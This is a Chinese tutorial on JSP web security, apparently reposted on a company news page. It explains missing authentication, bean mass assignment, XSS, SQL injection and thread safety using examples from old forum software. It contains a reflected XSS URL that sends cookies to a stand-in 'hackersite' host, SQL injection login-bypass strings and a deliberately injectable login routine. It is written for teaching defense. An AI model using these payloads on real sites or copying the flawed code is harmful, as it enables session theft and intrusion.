怎么写网络小说,盗墓笔记,遮天

新聞中心

這里有您想知道的互聯(lián)網(wǎng)營(yíng)銷(xiāo)解決方案

淺談JSP編程的安全實(shí)例分析

Java Server Page（JSP）作為建立動(dòng)態(tài)網(wǎng)頁(yè)的技術(shù)正在不斷升溫。JSP編程和ASP、PHP、工作機(jī)制不太一樣。一般說(shuō)來(lái)，JSP頁(yè)面在執(zhí)行時(shí)是編譯式，而不是解釋式的。首次調(diào)用JSP文件其實(shí)是執(zhí)行一個(gè)編譯為Servlet的過(guò)程。當(dāng)瀏覽器向服務(wù)器請(qǐng)求這一個(gè)JSP文件的時(shí)候，服務(wù)器將檢查自上次編譯后JSP文件是否有改變，如果沒(méi)有改變，就直接執(zhí)行Servlet，而不用再重新編譯，這樣，效率便得到了明顯提高。

創(chuàng)新互聯(lián)公司是一家專注于成都網(wǎng)站設(shè)計(jì)、成都網(wǎng)站制作與策劃設(shè)計(jì),稱多網(wǎng)站建設(shè)哪家好?創(chuàng)新互聯(lián)公司做網(wǎng)站,專注于網(wǎng)站建設(shè)10余年,網(wǎng)設(shè)計(jì)領(lǐng)域的專業(yè)建站公司;建站業(yè)務(wù)涵蓋:稱多等地區(qū)。稱多做網(wǎng)站價(jià)格咨詢:18980820575

今天我將和大家一起從腳本編程的角度看JSP的安全，那些諸如源碼暴露類的安全隱患就不在這篇文章討論范圍之內(nèi)了。寫(xiě)這篇文章的主要目的是給初學(xué)JSP編程的朋友們提個(gè)醒，從一開(kāi)始就要培養(yǎng)安全編程的意識(shí)，不要犯不該犯的錯(cuò)誤，避免可以避免的損失。另外，我也是初學(xué)者，如有錯(cuò)誤或其它意見(jiàn)請(qǐng)發(fā)帖賜教。

一、認(rèn)證不嚴(yán)——JSP編程低級(jí)失誤

在溢洋論壇v1.12 修正版中，

user_manager.jsp是用戶管理的頁(yè)面，作者知道它的敏感性，加上了一把鎖：

 
 
 
  
  
  if ((session.getValue("UserName")==null)││(session.getValue("UserClass")==null)││(! session.getValue("UserClass").equals("系統(tǒng)管理員")))   
  
  
  {   
  
  
  response.sendRedirect("err.jsp?id=14");   
  
  
  return;   
  
  
  }

如果要查看、修改某用戶的信息，就要用modifyuser_manager.jsp這個(gè)文件。管理員提交

http://www.somesite.com/yyforum/modifyuser_manager.jsp?modifyid=51

就是查看、修改ID為51的用戶的資料（管理員默認(rèn)的用戶ID為51）。但是，如此重要的文件竟缺乏認(rèn)證，普通用戶（包括游客）也直接提交上述請(qǐng)求也可以對(duì)其一覽無(wú)余（密碼也是明文存儲(chǔ)、顯示的）。modifyuser_manage.jsp同樣是門(mén)戶大開(kāi)，直到惡意用戶把數(shù)據(jù)更新的操作執(zhí)行完畢，重定向到user_manager.jsp的時(shí)候，他才會(huì)看見(jiàn)那個(gè)姍姍來(lái)遲的顯示錯(cuò)誤的頁(yè)面。顯然，只鎖一扇門(mén)是遠(yuǎn)遠(yuǎn)不夠的，編程的時(shí)候一定要不厭其煩地為每一個(gè)該加身份認(rèn)證的地方加上身份認(rèn)證。

二、守好JavaBean的入口

JSP組件技術(shù)的核心是被稱為bean的java組件。在程序中可把邏輯控制、數(shù)據(jù)庫(kù)操作放在javabeans組件中，然后在JSP文件中調(diào)用它，這樣可增加程序的清晰度及程序的可重用性。和傳統(tǒng)的ASP或PHP頁(yè)面相比，JSP頁(yè)面是非常簡(jiǎn)潔的，因?yàn)樵S多動(dòng)態(tài)頁(yè)面處理過(guò)程可以封裝到JavaBean中。

要改變JavaBean屬性，要用到“”標(biāo)記。

下面的代碼是假想的某電子購(gòu)物系統(tǒng)的源碼的一部分，這個(gè)文件是用來(lái)顯示用戶的購(gòu)物框中的信息的，而checkout.jsp是用來(lái)結(jié)帳的。

 
 
 
  
  
  You have added the item   
  
  
  to your basket.   
  
  
  Your total is $   
  
  
  Proceed to checkout

注意到property="*"了嗎？這表明用戶在可見(jiàn)的JSP頁(yè)面中輸入的，或是直接通過(guò)Query String提交的全部變量的值，將存儲(chǔ)到匹配的bean屬性中。

一般，用戶是這樣提交請(qǐng)求的：

http://www.somesite.com /addToBasket.jsp?newItem=ITEM0105342

但是不守規(guī)矩的用戶呢？他們可能會(huì)提交：

http://www.somesite.com /addToBasket.jsp?newItem=ITEM0105342&balance=0

這樣，balance=0的信息就被在存儲(chǔ)到了JavaBean中了。當(dāng)他們這時(shí)點(diǎn)擊“chekout”結(jié)賬的時(shí)候，費(fèi)用就全免了。

這與PHP中全局變量導(dǎo)致的安全問(wèn)題如出一轍。由此可見(jiàn)：“property="*"”一定要慎用！

三、長(zhǎng)盛不衰的跨站腳本

跨站腳本（Cross Site Scripting）攻擊是指在遠(yuǎn)程WEB頁(yè)面的HTML代碼中手插入惡意的JavaScript, VBScript, ActiveX, HTML, 或Flash等腳本，竊取瀏覽此頁(yè)面的用戶的隱私，改變用戶的設(shè)置，破壞用戶的數(shù)據(jù)?？缯灸_本攻擊在多數(shù)情況下不會(huì)對(duì)服務(wù)器和WEB程序的運(yùn)行造成影響，但對(duì)客戶端的安全構(gòu)成嚴(yán)重的威脅。

以仿動(dòng)網(wǎng)的阿菜論壇（beta-1）舉個(gè)最簡(jiǎn)單的例子。當(dāng)我們提交

http://www.somesite.com/acjspbbs/dispuser.jsp?name=someuser<; script>alert(document.cookie)

便能彈出包含自己cookie信息的對(duì)話框。而提交

http://www.somesite.com/acjspbbs/dispuser.jsp?name=someuser<; script>document.location='http://www.163.com'

就能重定向到網(wǎng)易。

由于在返回“name”變量的值給客戶端時(shí)，腳本沒(méi)有進(jìn)行任何編碼或過(guò)濾惡意代碼，當(dāng)用戶訪問(wèn)嵌入惡意“name”變量數(shù)據(jù)鏈接時(shí)，會(huì)導(dǎo)致腳本代碼在用戶瀏覽器上執(zhí)行，可能導(dǎo)致用戶隱私泄露等后果。比如下面的鏈接：

http://www.somesite.com/acjspbbs/dispuser.jsp?name=someuser<; script>document.location='http://www.hackersite.com/xxx.xxx?'+document.cookie

xxx.xxx用于收集后邊跟的參數(shù)，而這里參數(shù)指定的是document.cookie，也就是訪問(wèn)此鏈接的用戶的cookie。在ASP世界中，很多人已經(jīng)把偷cookie的技術(shù)練得爐火純青了。在JSP里，讀取cookie也不是難事。當(dāng)然，跨站腳本從來(lái)就不會(huì)局限于偷cookie這一項(xiàng)功能，相信大家都有一定了解，這里就不展開(kāi)了。

對(duì)所有動(dòng)態(tài)頁(yè)面的輸入和輸出都應(yīng)進(jìn)行編碼，可以在很大程度上避免跨站腳本的攻擊。遺憾的是，對(duì)所有不可信數(shù)據(jù)編碼是資源密集型的工作，會(huì)對(duì) Web 服務(wù)器產(chǎn)生性能方面的影響。常用的手段還是進(jìn)行輸入數(shù)據(jù)的過(guò)濾，比如下面的代碼就把危險(xiǎn)的字符進(jìn)行替換：

更積極的方式是利用正則表達(dá)式只允許輸入指定的字符：

 
 
 
  
  
  public boolean isValidInput(String str)   
  
  
  {   
  
  
  if(str.matches("[a-z0-9]+")) return true;   
  
  
  else return false;   
  
  
  }

四、時(shí)刻牢記SQL注入

一般的JSP編程書(shū)籍在教初學(xué)者的時(shí)候都不注意讓他們從入門(mén)時(shí)就培養(yǎng)安全JSP編程的習(xí)慣。著名的《JSP編程思想與實(shí)踐》就是這樣向初學(xué)者示范編寫(xiě)帶數(shù)據(jù)庫(kù)的登錄系統(tǒng)的（數(shù)據(jù)庫(kù)為MySQL）：

 
 
 
  
  
  Statement stmt = conn.createStatement();   
  
  
  String checkUser = "select * from login where username = '" + userName + "' and userpassword = '" + userPassword + "'";   
  
  
  ResultSet rs = stmt.executeQuery(checkUser);   
  
  
  if(rs.next())   
  
  
  response.sendRedirect("SuccessLogin.jsp");   
  
  
  else   
  
  
  response.sendRedirect("FailureLogin.jsp");

這樣使得盡信書(shū)的人長(zhǎng)期使用這樣先天“帶洞”的登錄代碼。如果數(shù)據(jù)庫(kù)里存在一個(gè)名叫“jack”的用戶，那么在不知道密碼的情況下至少有下面幾種方法可以登錄：

用戶名：jack

密碼：' or 'a'='a

用戶名：jack

密碼：' or 1=1/*

用戶名：jack' or 1=1/*

密碼：（任意）

lybbs（凌云論壇）ver 2.9.Server在LogInOut.java中是這樣對(duì)登錄提交的數(shù)據(jù)進(jìn)行檢查的：

if(s.equals("") ││ s1.equals(""))

throw new UserException("用戶名或密碼不能空。");

if(s.indexOf("'") != -1 ││ s.indexOf("\"") != -1 ││ s.indexOf(",") != -1 ││ s.indexOf("\\") != -1)

throw new UserException("用戶名不能包括 ' \" \\ , 等非法字符。");

if(s1.indexOf("'") != -1 ││ s1.indexOf("\"") != -1 ││ s1.indexOf("*") != -1 ││ s1.indexOf("\\") != -1)

throw new UserException("密碼不能包括 ' \" \\ * 等非法字符。");

if(s.startsWith("　") ││ s1.startsWith("　"))

throw new UserException("用戶名或密碼中不能用空格。");

但是我不清楚為什么他只對(duì)密碼而不對(duì)用戶名過(guò)濾星號(hào)。另外，正斜杠似乎也應(yīng)該被列到“黑名單”中。我還是認(rèn)為用正則表達(dá)式只允許輸入指定范圍內(nèi)的字符來(lái)得干脆。

這里要提醒一句：不要以為可以憑借某些數(shù)據(jù)庫(kù)系統(tǒng)天生的“安全性”就可以有效地抵御所有的攻擊。pinkeyes的那篇《PHP注入實(shí)例》就給那些依賴PHP的配置文件中的“magic_quotes_gpc = On”的人上了一課。

五、String對(duì)象帶來(lái)的隱患

Java平臺(tái)的確使安全編程更加方便了。Java中無(wú)指針，這意味著 Java 程序不再像C那樣能對(duì)地址空間中的任意內(nèi)存位置尋址了。在JSP文件被編譯成 .class 文件時(shí)會(huì)被檢查安全性問(wèn)題，例如當(dāng)訪問(wèn)超出數(shù)組大小的數(shù)組元素的嘗試將被拒絕，這在很大程度上避免了緩沖區(qū)溢出攻擊。但是，String對(duì)象卻會(huì)給我們帶來(lái)一些安全上的隱患。如果密碼是存儲(chǔ)在 Java String 對(duì)象中的，則直到對(duì)它進(jìn)行垃圾收集或進(jìn)程終止之前，密碼會(huì)一直駐留在內(nèi)存中。即使進(jìn)行了垃圾收集，它仍會(huì)存在于空閑內(nèi)存堆中，直到重用該內(nèi)存空間為止。密碼 String 在內(nèi)存中駐留得越久，遭到竊聽(tīng)的危險(xiǎn)性就越大。更糟的是，如果實(shí)際內(nèi)存減少，則操作系統(tǒng)會(huì)將這個(gè)密碼 String 換頁(yè)調(diào)度到磁盤(pán)的交換空間，因此容易遭受磁盤(pán)塊竊聽(tīng)攻擊。為了將這種泄密的可能性降至最低（但不是消除），您應(yīng)該將密碼存儲(chǔ)在 char 數(shù)組中，并在使用后對(duì)其置零（String 是不可變的，無(wú)法對(duì)其置零）。

六、線程安全初探

“JAVA能做的，JSP就能做”。與ASP、PHP等腳本語(yǔ)言不一樣，JSP默認(rèn)是以多線程方式執(zhí)行的。以多線程方式執(zhí)行可大大降低對(duì)系統(tǒng)的資源需求，提高系統(tǒng)的并發(fā)量及響應(yīng)時(shí)間。線程在程序中是獨(dú)立的、并發(fā)的執(zhí)行路徑，每個(gè)線程有它自己的堆棧、自己的程序計(jì)數(shù)器和自己的局部變量。雖然多線程應(yīng)用程序中的大多數(shù)操作都可以并行進(jìn)行，但也有某些操作（如更新全局標(biāo)志或處理共享文件）不能并行進(jìn)行。如果沒(méi)做好線程的同步，在大并發(fā)量訪問(wèn)時(shí)，不需要惡意用戶的“熱心參與”，問(wèn)題也會(huì)出現(xiàn)。最簡(jiǎn)單的解決方案就是在相關(guān)的JSP文件中加上: 指令，使它以單線程方式執(zhí)行，這時(shí)，所有客戶端的請(qǐng)求以串行方式執(zhí)行。這樣會(huì)嚴(yán)重降低系統(tǒng)的性能。我們可以仍讓JSP文件以多線程方式執(zhí)行，通過(guò)對(duì)函數(shù)上鎖來(lái)對(duì)線程進(jìn)行同步。一個(gè)函數(shù)加上synchronized 關(guān)鍵字就獲得了一個(gè)鎖?？聪旅娴氖纠?

 
 
 
  
  
  public class MyClass{   
  
  
  int a;   
  
  
  public Init() {//此方法可以多個(gè)線程同時(shí)調(diào)用   
  
  
  a = 0;   
  
  
  }   
  
  
  public synchronized void Set() {//兩個(gè)線程不能同時(shí)調(diào)用此方法   
  
  
  if(a>5) {   
  
  
  aa= a-5;   
  
  
  }   
  
  
  }   
  
  
  }

但是這樣仍然會(huì)對(duì)系統(tǒng)的性能有一定影響。一個(gè)更好的方案是采用局部變量代替實(shí)例變量。因?yàn)閷?shí)例變量是在堆中分配的，被屬于該實(shí)例的所有線程共享，不是線程安全的，而局部變量在堆棧中分配，因?yàn)槊總€(gè)線程都有它自己的堆棧空間，所以這樣線程就是安全的了。比如凌云論壇中添加好友的代碼：

 
 
 
  
  
  public void addFriend(int i, String s, String s1)   
  
  
  throws DBConnectException   
  
  
  {   
  
  
  try   
  
  
  {   
  
  
  if……   
  
  
  else   
  
  
  {   
  
  
  DBConnect dbconnect = new DBConnect("insert into friend (authorid,friendname) values (?,?)");   
  
  
  dbconnect.setInt(1, i);   
  
  
  dbconnect.setString(2, s);   
  
  
  dbconnect.executeUpdate();   
  
  
  dbconnect.close();   
  
  
  dbconnect = null;   
  
  
  }   
  
  
  }   
  
  
  catch(Exception exception)   
  
  
  {   
  
  
  throw new DBConnectException(exception.getMessage());   
  
  
  }   
  
  
  }

下面是調(diào)用：

 
 
 
  
  
  friendName=ParameterUtils.getString(request,"friendname");   
  
  
  if(action.equals("adduser")) {   
  
  
  forumFriend.addFriend(Integer.parseInt(cookieID),friendName,cookieName);   
  
  
  errorInfo=forumFriend.getErrorInfo();   
  
  
  }

如果采用的是JSP編程中的實(shí)例變量，那么該實(shí)例變量屬于該實(shí)例的所有線程共享，就有可能出現(xiàn)用戶A傳遞了某個(gè)參數(shù)后他的線程轉(zhuǎn)為睡眠狀態(tài)，而參數(shù)被用戶B無(wú)意間修改，造成好友錯(cuò)配的現(xiàn)象。

參考文獻(xiàn)：

Jordan Dimov：《JSP Security》

developerWorks：《Java安全性》

徐春金：編寫(xiě)線程安全的JSP程序

轉(zhuǎn)載自——KM工作室

【編輯推薦】

JSP連接ORACLE數(shù)據(jù)庫(kù)時(shí)注意的一些問(wèn)題
JSP中tomcat的SQL Server2000數(shù)據(jù)庫(kù)連接池的配置
簡(jiǎn)單介紹Servlets和JSP的區(qū)別
JSP include指令和include行為的區(qū)別
JSP輸出excel文檔和中文亂碼問(wèn)題的解決

本文名稱：淺談JSP編程的安全實(shí)例分析
網(wǎng)頁(yè)路徑：http://m.fisionsoft.com.cn/article/dphjhhs.html

新聞中心

其他資訊